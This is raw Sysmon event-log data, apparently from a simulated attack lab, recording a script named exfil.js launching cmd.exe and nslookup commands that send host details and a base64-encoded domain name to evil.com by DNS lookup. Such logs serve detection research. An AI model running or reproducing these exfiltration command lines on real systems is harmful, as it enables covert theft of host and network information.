14:21:28.812{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E8-629A-3343-000000005F02}3792C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207888Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.812{2E1864BB-18E0-629A-6742-000000005F02}3976488C:\Windows\System32\WScript.exe{2E1864BB-18E8-629A-3343-000000005F02}3792C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207887Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.820{2E1864BB-18E8-629A-3343-000000005F02}3792C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Amazon EC2 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllyzi.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000207886Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.812{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlvskshh.tmpMD5=56DBCEFC15EB1306F8CE602736A8089D,SHA256=D5DF994C5494FA571A4E37094E6011B6EAA7240C900C90D4E5CDDC8058C5BBCD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207885Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.797{2E1864BB-18E8-629A-3143-000000005F02}74565104C:\Windows\system32\conhost.exe{2E1864BB-18E8-629A-3243-000000005F02}6416C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207884Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.797{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207883Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.797{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207882Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.797{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207881Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.797{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207880Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.797{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E8-629A-3243-000000005F02}6416C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207879Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.797{2E1864BB-18E8-629A-3043-000000005F02}77722020C:\Windows\system32\cmd.exe{2E1864BB-18E8-629A-3243-000000005F02}6416C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207878Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.798{2E1864BB-18E8-629A-3243-000000005F02}6416C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Model: t3.2xlarge evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E8-629A-3043-000000005F02}7772C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Model: t3.2xlarge evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvskshh.tmp 2>&1 10341000x8000000000000000207877Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.778{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E8-629A-3143-000000005F02}7456C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207876Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.778{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E8-629A-3143-000000005F02}7456C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207875Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.759{2E1864BB-18E8-629A-3143-000000005F02}74565104C:\Windows\system32\conhost.exe{2E1864BB-18E8-629A-3043-000000005F02}7772C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207874Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.759{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E8-629A-3143-000000005F02}7456C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207873Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.744{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207872Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.744{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207871Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.744{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207870Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.744{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207869Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.744{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E8-629A-3043-000000005F02}7772C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207868Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.744{2E1864BB-18E0-629A-6742-000000005F02}39767840C:\Windows\System32\WScript.exe{2E1864BB-18E8-629A-3043-000000005F02}7772C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207867Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.751{2E1864BB-18E8-629A-3043-000000005F02}7772C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Model: t3.2xlarge evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvskshh.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000207866Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.744{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlgzdu.tmpMD5=7564BBC357DA8472A939C2EE79A792F5,SHA256=2DBE8B361679ED57394E9EFB1DF40D5559A7E60F6F1F0A6E2904E60B52067C41,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207865Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.712{2E1864BB-18E8-629A-2E43-000000005F02}42327780C:\Windows\system32\conhost.exe{2E1864BB-18E8-629A-2F43-000000005F02}6076C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207864Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.712{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207863Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.712{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207862Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.712{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E8-629A-2F43-000000005F02}6076C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207861Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.712{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207860Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.712{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207859Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.712{2E1864BB-18E8-629A-2D43-000000005F02}55567796C:\Windows\system32\cmd.exe{2E1864BB-18E8-629A-2F43-000000005F02}6076C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207858Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.718{2E1864BB-18E8-629A-2F43-000000005F02}6076C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E8-629A-2D43-000000005F02}5556C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgzdu.tmp 2>&1 